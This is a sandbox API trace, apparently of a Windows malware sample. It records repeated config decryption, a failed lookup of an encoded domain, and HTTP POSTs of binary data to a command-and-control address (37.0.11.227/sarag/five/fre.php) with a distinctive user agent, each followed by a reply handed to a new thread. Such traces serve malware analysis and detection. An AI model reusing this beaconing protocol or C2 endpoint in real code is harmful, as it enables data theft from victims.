[0281.812] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.813] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.813] GetProcessHeap () returned 0x690000 [0281.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0281.813] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.813] GetProcessHeap () returned 0x690000 [0281.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0281.814] GetProcessHeap () returned 0x690000 [0281.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0281.814] GetProcessHeap () returned 0x690000 [0281.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.815] GetProcessHeap () returned 0x690000 [0281.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0281.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.816] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.824] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0281.830] GetProcessHeap () returned 0x690000 [0281.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0281.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.831] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.832] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.833] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.833] GetProcessHeap () returned 0x690000 [0281.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0281.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.839] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0281.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.840] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.844] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0281.844] GetProcessHeap () returned 0x690000 [0281.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0281.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.845] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0281.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.846] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0281.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.847] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0281.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.848] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0281.848] GetProcessHeap () returned 0x690000 [0281.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0281.848] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0281.848] GetProcessHeap () returned 0x690000 [0281.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0281.849] socket (af=2, type=1, protocol=6) returned 0x8c8 [0281.849] connect (s=0x8c8, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0281.874] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0281.874] GetProcessHeap () returned 0x690000 [0281.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0281.874] GetProcessHeap () returned 0x690000 [0281.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0281.875] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.876] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0281.876] GetProcessHeap () returned 0x690000 [0281.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0281.876] GetProcessHeap () returned 0x690000 [0281.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.878] GetProcessHeap () returned 0x690000 [0281.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0281.878] GetProcessHeap () returned 0x690000 [0281.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0281.878] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.879] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0281.879] GetProcessHeap () returned 0x690000 [0281.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0281.879] GetProcessHeap () returned 0x690000 [0281.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.880] send (s=0x8c8, buf=0x6ad508*, len=242, flags=0) returned 242 [0281.880] send (s=0x8c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0281.880] GetProcessHeap () returned 0x690000 [0281.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0281.880] recv (in: s=0x8c8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0281.954] GetProcessHeap () returned 0x690000 [0281.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0281.955] GetProcessHeap () returned 0x690000 [0281.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0281.955] GetProcessHeap () returned 0x690000 [0281.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0281.956] GetProcessHeap () returned 0x690000 [0281.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0281.956] closesocket (s=0x8c8) returned 0 [0281.956] GetProcessHeap () returned 0x690000 [0281.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0281.956] GetProcessHeap () returned 0x690000 [0281.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0281.957] GetProcessHeap () returned 0x690000 [0281.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.957] GetProcessHeap () returned 0x690000 [0281.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0281.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16b8) returned 0x8c8 [0281.959] Sleep (dwMilliseconds=0xea60) [0281.960] GetProcessHeap () returned 0x690000 [0281.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0281.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.961] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0281.976] GetProcessHeap () returned 0x690000 [0281.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0281.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.979] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.979] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.980] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.980] GetProcessHeap () returned 0x690000 [0281.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0281.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.982] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0281.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.983] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.983] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0281.984] GetProcessHeap () returned 0x690000 [0281.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0281.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.984] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.985] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.986] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.987] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.988] GetProcessHeap () returned 0x690000 [0281.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0281.988] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.988] GetProcessHeap () returned 0x690000 [0281.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0281.989] GetProcessHeap () returned 0x690000 [0281.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0281.989] GetProcessHeap () returned 0x690000 [0281.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.989] GetProcessHeap () returned 0x690000 [0281.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0281.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.992] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.998] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0282.004] GetProcessHeap () returned 0x690000 [0282.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0282.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.005] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.006] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.016] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.016] GetProcessHeap () returned 0x690000 [0282.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0282.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.018] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0282.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.020] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.021] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0282.021] GetProcessHeap () returned 0x690000 [0282.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0282.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.022] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0282.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.023] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0282.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.024] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0282.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.025] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0282.025] GetProcessHeap () returned 0x690000 [0282.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0282.025] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0282.025] GetProcessHeap () returned 0x690000 [0282.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0282.026] socket (af=2, type=1, protocol=6) returned 0x8cc [0282.026] connect (s=0x8cc, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0282.055] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0282.055] GetProcessHeap () returned 0x690000 [0282.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0282.055] GetProcessHeap () returned 0x690000 [0282.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0282.056] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.057] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.057] GetProcessHeap () returned 0x690000 [0282.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0282.057] GetProcessHeap () returned 0x690000 [0282.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.058] GetProcessHeap () returned 0x690000 [0282.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0282.058] GetProcessHeap () returned 0x690000 [0282.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0282.059] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.059] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.059] GetProcessHeap () returned 0x690000 [0282.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0282.059] GetProcessHeap () returned 0x690000 [0282.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.060] send (s=0x8cc, buf=0x6ad508*, len=242, flags=0) returned 242 [0282.061] send (s=0x8cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0282.061] GetProcessHeap () returned 0x690000 [0282.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0282.061] recv (in: s=0x8cc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0282.149] GetProcessHeap () returned 0x690000 [0282.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0282.149] GetProcessHeap () returned 0x690000 [0282.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.150] GetProcessHeap () returned 0x690000 [0282.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0282.150] GetProcessHeap () returned 0x690000 [0282.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0282.150] closesocket (s=0x8cc) returned 0 [0282.151] GetProcessHeap () returned 0x690000 [0282.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0282.151] GetProcessHeap () returned 0x690000 [0282.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0282.151] GetProcessHeap () returned 0x690000 [0282.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0282.151] GetProcessHeap () returned 0x690000 [0282.152] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0282.153] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16c0) returned 0x8cc [0282.154] Sleep (dwMilliseconds=0xea60) [0282.156] GetProcessHeap () returned 0x690000 [0282.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0282.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.162] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0282.167] GetProcessHeap () returned 0x690000 [0282.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0282.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.168] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.169] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.170] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.170] GetProcessHeap () returned 0x690000 [0282.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0282.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.171] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0282.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.172] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.173] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0282.173] GetProcessHeap () returned 0x690000 [0282.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0282.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.174] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.175] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.176] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.176] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.176] GetProcessHeap () returned 0x690000 [0282.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0282.176] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.177] GetProcessHeap () returned 0x690000 [0282.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0282.177] GetProcessHeap () returned 0x690000 